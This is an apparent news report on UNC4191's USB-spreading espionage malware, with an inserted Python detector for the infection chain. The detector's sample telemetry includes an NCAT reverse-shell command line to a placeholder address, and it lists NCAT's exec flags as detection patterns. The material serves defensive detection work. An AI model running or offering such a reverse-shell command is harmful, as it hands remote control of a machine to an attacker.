Security researchers have observed a recent threat campaign by the China-backed APT group ‘UNC4191’, which uses malware that self-replicates onto USB drives to infect victims. This technique lets the actors reach and exfiltrate data from air-gapped systems.
Targets in Southeast Asia, the Asia-Pacific region, Europe, and the US were the prime focus of UNC4191 in this campaign, with the Philippines the most heavily affected country. The actors deployed legitimately signed binaries to propagate their malware strains.
Some malware strains spread by UNC4191 include the Bluehaze launcher, the Mistcloak launcher, and the Darkdew dropper.
In the observed activity, the group deployed the NCAT command-line networking utility on the targeted computer to open a reverse shell, which could give them backdoor access.
Furthermore, the malware could self-replicate by infecting any USB drive plugged into a compromised computer. Once replicated, the payloads could spread to additional systems and networks and collect sensitive data from the victims’ air-gapped systems.
UNC4191’s infection chain begins when a user connects an infected removable drive or USB flash drive to a computer and runs the USB Network Gate application stored on it, which side-loads the Mistcloak launcher.
Mistcloak loads an INI file containing the Darkdew dropper, which establishes persistence and infects USB drives connected to the victim’s system.
Bluehaze, deployed in the third phase of the infection chain, launches a renamed NCAT executable that creates a reverse shell to a hardcoded attacker-controlled C2 server.
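As an added defender-side example (not code from the article or from the researchers' report), the following Python script applies the three observable traits of the chain described above to constructed process-creation and image-load events: a program executed from removable media, a DLL loaded by that program from the same media (the side-load step), and an NCAT binary that runs under a different file name and is invoked with command-execution flags. The field names follow a Sysmon-like schema; all paths, file names, the C2 address and the drive-letter set are assumptions for illustration.

```python
"""Heuristics for the three-stage USB infection chain described above.

Constructed events use Sysmon-like field names (Image, OriginalFileName,
CommandLine, ParentImage, ImageLoaded). Every path, file name and address
below is an assumption made up for this example, not an indicator from the
report.
"""
from dataclasses import dataclass
import ntpath

# Assumed set of drive letters backed by removable media. A real collector
# would resolve this per host (for example from Win32_LogicalDisk.DriveType).
REMOVABLE_DRIVES = {"E:", "F:"}

# NCAT flags that hand a connection to a local program (documented ncat options).
NCAT_EXEC_FLAGS = {"-e", "--exec", "--sh-exec"}


@dataclass
class Event:
    kind: str                    # "process" (creation) or "imageload" (DLL load)
    image: str                   # path of the executing process
    original_file_name: str = "" # PE version-info OriginalFileName, if present
    command_line: str = ""
    parent_image: str = ""
    image_loaded: str = ""       # DLL path, only for imageload events


def on_removable(path: str) -> bool:
    """True when the path's drive letter belongs to the removable-media set."""
    drive, _ = ntpath.splitdrive(path)
    return drive.upper() in REMOVABLE_DRIVES


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def is_ncat(ev: Event) -> bool:
    """NCAT is recognised by its PE original name even after the file is renamed."""
    return ev.original_file_name.lower() == "ncat.exe" or basename(ev.image) == "ncat.exe"


def check_event(ev: Event) -> list:
    """Return the names of every heuristic the event matches."""
    hits = []
    if ev.kind == "process":
        # Stage 1: the chain starts with a program run from the USB drive itself.
        if on_removable(ev.image):
            hits.append("launch_from_removable_media")
        # Stage 3: NCAT running under a file name other than ncat.exe.
        if ev.original_file_name.lower() == "ncat.exe" and basename(ev.image) != "ncat.exe":
            hits.append("renamed_ncat")
        # Stage 3: NCAT asked to attach a local program to the connection.
        tokens = set(ev.command_line.lower().split())
        if is_ncat(ev) and tokens & NCAT_EXEC_FLAGS:
            hits.append("ncat_exec_redirection")
    elif ev.kind == "imageload":
        # Stage 1: a program on the USB drive pulling a DLL from the same drive,
        # the shape of the side-load that brings in the launcher.
        if on_removable(ev.image) and on_removable(ev.image_loaded):
            hits.append("dll_loaded_from_removable_media")
    return hits


def analyze(events) -> list:
    """Flatten findings to (process basename, heuristic) pairs for triage."""
    return [(basename(ev.image), hit) for ev in events for hit in check_event(ev)]


# Constructed sample telemetry; names and addresses are placeholders.
SAMPLE_EVENTS = [
    Event(kind="process", image=r"E:\app\usb_network_gate.exe",
          original_file_name="usb_network_gate.exe",
          parent_image=r"C:\Windows\explorer.exe"),
    Event(kind="imageload", image=r"E:\app\usb_network_gate.exe",
          image_loaded=r"E:\app\helper.dll"),
    Event(kind="process", image=r"C:\Users\user\AppData\Local\Temp\w.exe",
          original_file_name="ncat.exe",
          command_line=r"w.exe 203.0.113.10 443 -e cmd.exe",
          parent_image=r"C:\Users\user\AppData\Local\Temp\launcher.exe"),
    Event(kind="process", image=r"C:\Windows\System32\notepad.exe",
          original_file_name="notepad.exe", command_line="notepad.exe"),
]

if __name__ == "__main__":
    for process, rule in analyze(SAMPLE_EVENTS):
        print(f"{rule:34} {process}")
```

The renamed-binary check depends on the PE `OriginalFileName` field, which a collector such as Sysmon records at process creation; an attacker who also strips version information defeats that single check, which is why the command-line and removable-media heuristics are evaluated independently rather than chained.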
The security analysts’ report notes that no evidence of interaction with the reverse shell was found in the campaign, although the age of the activity, gaps in visibility, or short log retention periods could account for this.
The Philippines appears to have been the most targeted country in this campaign, based on the number of affected systems identified within its territory.
Believed to have begun in September of last year, UNC4191’s campaign targets public and private organisations for cyberespionage. Experts also assess that the group’s campaigns are aligned with China’s political and commercial interests.
